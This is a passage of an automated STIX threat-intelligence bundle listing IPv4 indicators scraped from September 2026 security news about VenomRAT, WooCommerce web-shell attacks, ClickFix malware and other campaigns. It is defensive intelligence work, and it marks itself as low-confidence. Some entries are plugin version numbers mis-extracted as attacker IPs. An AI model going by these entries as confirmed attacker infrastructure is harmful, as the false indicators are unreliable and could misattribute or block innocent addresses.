{"type":"bundle","id":"bundle--056ac002-1ba5-44eb-83d9-ea695622d054","objects":[{"type":"identity","spec_version":"2.1","id":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","created":"2026-09-16T10:05:33.383Z","modified":"2026-09-16T10:05:33.383Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--de368f9b-50c3-49d5-9e54-2d661858728f","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 154.36.188.201","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: ed process handling. The recovered configuration pointed to 154.36.188.201:4449 and identified the implant as Venom RAT + HVNC + Steal","pattern":"[ipv4-addr:value = '154.36.188.201']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c6d6a68-4a43-49a7-9ff5-6479cd7226d8","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 155.94.154.195","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: Sender address / DKIM domain dfgfasd@hsaui[.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth hos","pattern":"[ipv4-addr:value = '155.94.154.195']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2dd7d3c7-ee27-43f6-a044-62d0212a6bfa","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.194.9.138","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 5c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a succes","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d437ecd9-0202-4210-97da-3cc743106cd6","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 114.10.43.203","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 0 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a successful attack permits an attac","pattern":"[ipv4-addr:value = '114.10.43.203']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--adc6c039-5647-411d-95ec-3508c52739a9","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 187.75.114.36","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a successful attack pe","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66b7d3fc-f3b9-4be9-80bc-72c67ce27e85","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.137.105.214","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 41.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97423e2f-8d51-4936-8d49-ec43394d5673","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.180.120.140","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: .129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Be","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0fd494da-8f05-422d-9768-f97a4a5970e4","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 31.59.129.150","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: originated from the following IP addresses - 92.241.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.1","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ceb05527-c978-4b76-b625-d0011fdb5572","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 37.114.144.209","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 14 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a successful attack permits an attacker to upload a","pattern":"[ipv4-addr:value = '37.114.144.209']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55721d27-b7b6-4824-9ea4-1859ab378e22","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 6.17.4.1","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: the plugin, has addressed the flaws in version 6.17.3.1 and 6.17.4.1, respectively. Found this article interesting? Follow us on","pattern":"[ipv4-addr:value = '6.17.4.1']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--834a2803-18c6-4d6c-a14a-866d39125233","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 92.241.13.140","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: dresses - 92.241.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 1","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ce9627d-d52c-4001-92fe-375b0d2b112f","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 92.241.13.213","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: attempts have originated from the following IP addresses - 92.241.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.10","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fbb40c4b-4273-4289-93ae-a4ba4b38f71b","created":"2026-09-15T14:45:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers target WordPress sites via third-party WooCommerce plugin\" (BleepingComputer). Context: aw is tracked as CVE-2026-27540 and impacts plugin versions 2.0.3.1 and older. It is an unauthenticated arbitrary file-upload v","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T14:45:10.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-wordpress-sites-via-third-party-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3baf72c2-a01b-48a2-84a9-a51e0350af3f","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentio","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6adbade0-a8ef-4416-8dbe-1f14ca54881f","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: .13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentionally defanged (","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a150cb3-fc98-45ec-9b11-31402f36ce13","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: bility , tracked as CVE-2026-27540, affects plugin versions 2.0.3.1 and earlier and has received a CVSS severity score of 9.8 o","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b84af719-047f-4ccf-b60c-3c9889b3034f","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP a","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6795f70-ff56-4923-bcca-987f22ce5db8","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and doma","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b844e6e-84f2-45bb-937b-60fb6f2004d0","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: e most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 blocked requests, fo","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7afbd11b-4269-4402-8d4a-c28821b8116c","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: r 1 92.241.13.213 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f689b4d7-2ee8-4aab-a50d-dcf7ab9b83e7","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: and August 30. The most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 bl","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--54762987-74f7-4e22-9f0c-c9a309b8ee21","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,600 blocked exploit requests IP address 104.194.9.138 Observed source of more than 6,100 blocked exploit requests","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8da93661-d95a-49e8-bdcb-05ad14a51ef7","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 114.10.43.203","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 470 blocked exploit requests IP address 114.10.43.203 Observed source of more than 310 blocked exploit requests I","pattern":"[ipv4-addr:value = '114.10.43.203']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f7473378-6870-4803-b872-e827bc3d3653","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,100 blocked exploit requests IP address 187.75.114.36 Observed source of more than 470 blocked exploit requests I","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c1ddc4bf-6c76-4fc7-9c6b-7a6a5b86dc18","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 9,100 blocked exploit requests IP address 23.137.105.214 Observed source of more than 6,700 blocked exploit requests","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9cf50b50-d572-4896-9b75-e9adab015124","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,700 blocked exploit requests IP address 23.180.120.140 Observed source of more than 6,600 blocked exploit requests","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6941f094-ddce-4a4f-a909-4ef00dd89a50","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 24,900 blocked exploit requests IP address 31.59.129.150 Observed source of more than 24,000 blocked exploit request","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a3ec760-c61e-4e03-8d3f-19d586382158","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 37.114.144.209","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 310 blocked exploit requests IP address 37.114.144.209 Observed source of more than 310 blocked exploit requests F","pattern":"[ipv4-addr:value = '37.114.144.209']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c5dd455-f470-499b-afca-157a82409e35","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 16,000 blocked exploit requests IP address 92.241.13.140 Observed source of more than 9,100 blocked exploit requests","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61e694b0-f86f-4f8a-b718-140128a908a6","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description IP address 92.241.13.213 Observed source of more than 24,900 blocked exploit request","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05c73c45-d8ed-49f6-b8e2-256a72141cd5","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 164.90.161.147","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: lemetry and /contact exfiltration September macOS execution 164.90.161.147:80 September macOS Post-execution HTTP contact September ma","pattern":"[ipv4-addr:value = '164.90.161.147']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5a04bdff-7580-472d-8e83-6efc1f3c4951","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 165.22.199.85","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: rect-to-IP TLS C2 using facebook.com SNI Exact PE execution 165.22.199.85 September macOS Telemetry and /contact exfiltration Septemb","pattern":"[ipv4-addr:value = '165.22.199.85']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--231282c9-32d1-4b04-8a0f-5ee7995328bd","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.94.47.204","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: omains. Indicators of Compromise Address Branch Role Source 45.94.47.204:80 AMOS helper Enrollment, task polling, and acknowledgemen","pattern":"[ipv4-addr:value = '45.94.47.204']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b33705a-9ef9-4a56-ad89-d6588c2ef7c8","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 77.91.65.13","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: nd-and-control technique in which Amatera communicated with 77.91.65.13:443 while presenting facebook.com in TLS SNI and HTTP autho","pattern":"[ipv4-addr:value = '77.91.65.13']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4b01fde-f5d2-4655-9111-7a3c2e77ed3a","created":"2026-09-14T13:33:25.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 89.34.96.56","description":"Seen in \"Cyclops Blink Evolves Into x86-64 Linux Implant With Packet Sniffing and Internal Network Scanning\" (Cyber Security News). Context: ompromise (IoCs):- Type Indicator Description C2 IP address 89.34.96.56 Hard-coded Cyclops Blink command-and-control server C2 TCP","pattern":"[ipv4-addr:value = '89.34.96.56']","pattern_type":"stix","valid_from":"2026-09-14T13:33:25.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/cyclops-blink-evolves/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b4f535f-c833-4372-946c-157a81e6fa81","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.218.50.207","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: n Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging server hosted on Alibaba Cloud in Hong Kong Domain","pattern":"[ipv4-addr:value = '8.218.50.207']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security 